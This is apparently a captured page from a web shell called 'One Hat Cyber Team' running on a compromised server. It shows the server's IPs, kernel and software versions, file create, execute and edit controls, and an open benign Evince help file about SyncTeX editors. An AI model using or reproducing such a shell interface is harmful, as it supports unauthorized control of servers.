One Hat Cyber Team
Your IP :
216.73.216.50
Server IP :
157.15.65.100
Server :
Linux 157-15-65-100.cprapid.com 5.14.0-362.24.2.el9_3.x86_64 #1 SMP PREEMPT_DYNAMIC Sat Mar 30 14:11:54 EDT 2024 x86_64
Server Software :
Apache
PHP Version :
8.2.28
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
help
/
sl
/
evince
/
Edit File:
synctex-editors.page
<?xml version="1.0" encoding="utf-8"?> <page xmlns="http://projectmallard.org/1.0/" type="topic" style="task" id="synctex-editors" xml:lang="sl"> <info> <link type="guide" xref="index#synctex" group="fourth"/> <desc>Kateri urejevalnik lahko uporabite za urejanje svojih datotek TEX?</desc> <revision pkgversion="3.2" version="0.1" date="2011-09-05" status="final"/> <credit type="author"> <name>Tiffany Antopolski</name> <email>tiffany@antopolski.com</email> </credit> <license> <p>Dovoljenje Creative Commons - priznanje avtorstva - deljenje pod istimi pogoji 3.0</p> </license> </info> <title>Podprti urejevalniki</title> <section id="gedit"><title><app>gedit</app></title> <p>Podprta sta tako <link xref="synctex-search#forward-search">Iskanje naprej</link> (iz <app>Gedit</app> v <app>pregledovalnik dokumentov</app>) in <link xref="synctex-search#backward-search">Iskanje</link> (iz <app>pregledovalnika dokumentov</app> v <app>Gedit</app>).</p> </section> <section id="vim-latex"><title>Vim-latex</title> <p> The <app>gedit</app> plugin contains a python script (<file>evince_dbus.py</file>) that can be used to get SyncTeX working with Vim. In order to use vim-latex together with the <app>document viewer</app> you need to follow the next steps: </p> <steps> <item> <p> Copy the <file>evince_dbus.py</file> to some directory in your path and give it +x permissions. </p> </item> <item> <p> Modify your <file>~/.vimrc</file> file and add the following lines. </p> <code> let g:Tex_ViewRule_pdf = 'evince_dbus.py' let g:Tex_DefaultTargetFormat = 'pdf' let g:Tex_CompileRule_pdf = 'pdflatex --synctex=1 -interaction=nonstopmode $*' </code> </item> <item> <p>Sedaj lahko uporabljate iskanje naprej iz vim-latex s tipkanjem \ls. Iskanje nazaj še ni podprto.</p> </item> </steps> </section> </page>
Simpan